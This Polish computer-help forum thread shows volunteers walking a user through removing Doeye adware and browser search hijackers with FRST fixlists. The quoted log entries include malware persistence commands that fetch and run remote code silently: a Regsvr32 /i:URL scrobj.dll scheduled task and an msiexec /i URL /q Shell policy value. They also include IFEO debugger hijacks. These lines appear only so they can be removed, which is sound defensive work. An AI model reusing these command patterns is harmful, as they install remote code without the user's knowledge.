Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Aplikacja Doeye oraz fake wyszukiwarki - prośba o naprawę z FRST

radd91 15 Maj 2017 14:35 657 7
  • #1 15 Maj 2017 14:35
    radd91
    Poziom 11  

    Cześć,

    Proszę o rozszyfrowanie logów z FRTS. Na komputerze została zainstalowana podejrzana aplikacja Doeye. Na przeglądarkach Chrome oraz Mozzila dodały się fake wyszukiwarki zamiast stron startowych. Nie pomogło ADWCleaner ani AntiMalware.

    0 7
  • #2 15 Maj 2017 15:59
    krzychupar
    Poziom 40  

    Otwórz notatnik systemowy i wklej:

    HKU\S-1-5-21-3874262708-2497950410-675821866-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) <==== UWAGA
    Task: {2F9477C7-B70D-4D1C-9F43-08E437E06D46} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
    Task: {F62C9156-FAF3-48B4-A62A-B0430A03E776} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
    HKLM-x32\...\Run: [] => [X]
    HKU\S-1-5-21-3874262708-2497950410-675821866-1001\...\Run: [background_fault] => C:\Users\dell\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-03] (AVAST Software) <===== UWAGA
    HKU\S-1-5-21-3874262708-2497950410-675821866-1001\...\MountPoints2: {d4dd4c96-7bf4-11e6-bfa5-806e6f6e6963} - "D:\Setup.exe"
    IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
    IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
    IFEO\taskmgr.exe: [Debugger]
    ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku




    ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    SearchScopes: HKU\S-1-5-21-3874262708-2497950410-675821866-1001 -> {16C47424-D2AB-47D7-800E-155FE9F67635} URL =
    Edge HomeButtonPage: HKU\S-1-5-21-3874262708-2497950410-675821866-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=...p;uid=TOSHIBAXMQ01ABF050_86J6S1ADSXX86J6S1ADS
    FF NewTab: Mozilla\Firefox\Profiles\ize3gluc.default -> hxxp://www.luckysearch123.com?type=hp&ts=...;z=234dffcb1ee0bbca40289c0gaz2t6c2odmfzfmeq8q
    FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ize3gluc.default -> luck
    FF SearchEngineOrder.1: Mozilla\Firefox\Profiles\ize3gluc.default -> luck
    FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ize3gluc.default -> luck
    FF Homepage: Mozilla\Firefox\Profiles\ize3gluc.default -> hxxp://www.luckysearch123.com?type=hp&ts=...;z=234dffcb1ee0bbca40289c0gaz2t6c2odmfzfmeq8q
    R2 NPASRE; C:\Users\dell\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
    S3 dbx; system32\DRIVERS\dbx.sys [X]
    2017-05-15 14:22 - 2017-05-15 14:22 - 00000000 ____D C:\Users\dell\Desktop\FRST-OlderVersion
    2017-05-12 13:50 - 2017-05-15 13:57 - 00000000 ____D C:\AdwCleaner
    2017-05-11 17:02 - 2017-05-11 17:02 - 04102600 _____ C:\Users\dell\Downloads\adwcleaner_6.046 (2).exe
    2017-05-11 16:25 - 2017-05-11 16:25 - 04102600 _____ C:\Users\dell\Downloads\adwcleaner_6.046 (1).exe
    2017-05-11 13:37 - 2017-05-11 15:50 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333
    2017-05-11 13:37 - 2017-05-11 15:50 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
    2017-05-11 13:36 - 2017-05-11 15:50 - 00000000 _____ C:\WINDOWS\SysWOW64\00
    2017-05-05 10:10 - 2017-05-11 13:40 - 00000000 _____ C:\WINDOWS\SysWOW64\22
    2017-05-05 10:07 - 2017-05-10 09:36 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-05-05 10:07 - 2017-05-05 10:07 - 00000000 ____D C:\WINDOWS\psgo
    2017-04-26 14:37 - 2017-04-26 14:37 - 00000000 ___HD C:\$AV_ASW
    2017-04-25 11:57 - 2017-05-11 15:53 - 00000000 _____ C:\WINDOWS\SysWOW64\33
    2017-04-25 11:51 - 2017-05-11 15:50 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2016-09-16 11:50 - 2016-09-16 11:52 - 0000106 _____ () C:\ProgramData\{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}.log
    2016-09-16 11:56 - 2016-09-16 11:56 - 0000105 _____ () C:\ProgramData\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}.log
    2016-09-16 11:54 - 2016-09-16 11:54 - 0000100 _____ () C:\ProgramData\{6BADCD73-E925-46F7-A295-FF2448632728}.log
    2016-09-16 11:56 - 2016-09-16 11:56 - 0000098 _____ () C:\ProgramData\{CEF5334F-B91A-4327-ACAE-AA50DCE3F995}.log
    C:\Users\dell\AppData\Local\background_fault\aswRD.exe
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze obok FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • #3 15 Maj 2017 18:22
    Kolobos
    Spec od komputerów

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0
  • #5 16 Maj 2017 10:10
    Kolobos
    Spec od komputerów

    Wykonaj Fixlist.txt dla FRST:
    Task: {75321704-8B95-4DD4-B3E9-350698AC9673} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPGRvw2hpEaQ4rGYcMDQiZjH1MQ04Nah2wdQhZAN4nWq2mjZdMDQkwc== scrobj.dll
    Shortcut: C:\Users\dell\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.)
    HKU\S-1-5-21-3874262708-2497950410-675821866-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPGR...4rGYcMDQiZjH1MQ04Nah2wdQhZAN4nWq2mjZdMDQkwc== /q
    ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    FF Extension: (xRocket Toolbar) - C:\Users\dell\AppData\Roaming\Mozilla\Firefox\Profiles\ize3gluc.default\Extensions\arthurj8283@gmail.com [2017-04-27] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Users\dell\AppData\Roaming\Mozilla\Firefox\Profiles\ize3gluc.default\searchplugins\luck.xml [2017-04-27]
    FF SearchPlugin: C:\Users\dell\AppData\Roaming\Mozilla\Firefox\Profiles\ize3gluc.default\searchplugins\ourluckysites.xml [2017-05-05]
    FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\dell\AppData\Roaming\Mozilla\Firefox\Profiles\ize3gluc.default\extensions\arthurj8283@gmail.com
    2017-05-16 09:48 - 2017-05-16 09:48 - 00000000 ____D C:\Users\dell\Desktop\FRST-OlderVersion
    2017-05-12 14:11 - 2017-05-16 09:26 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-05-11 15:53 - 2017-05-11 15:53 - 00000000 ____D C:\Users\dell\AppData\Local\Bagsarah
    2017-05-11 15:50 - 2017-05-11 15:50 - 00000000 ____D C:\Users\Public\Documents\Google
    2017-05-11 15:50 - 2017-05-11 15:50 - 00000000 ____D C:\Program Files (x86)\Bagsarah
    2017-05-11 13:36 - 2017-05-11 13:36 - 00000000 ____D C:\Users\dell\AppData\Local\NPASRE
    2017-05-09 12:28 - 2017-05-12 13:33 - 00000000 _____ C:\WINDOWS\SysWOW64\1111
    2017-05-05 12:01 - 2017-05-16 09:06 - 00000000 ____D C:\Users\dell\AppData\Local\background_fault


    Po wykonaniu sprawdz czy jest ok.

    0
  • Pomocny post
    #7 16 Maj 2017 11:20
    Kolobos
    Spec od komputerów

    Przywroc domyslne ustawienia Edge, w logach nie widac wpisow z edge. Zapewne dlatego, ze prawie nikt nie korzysta z tej "przegladarki".

    0
  • #8 27 Gru 2017 15:55
    radd91
    Poziom 11  

    Dzięki, sprawa załatwiona :)

    0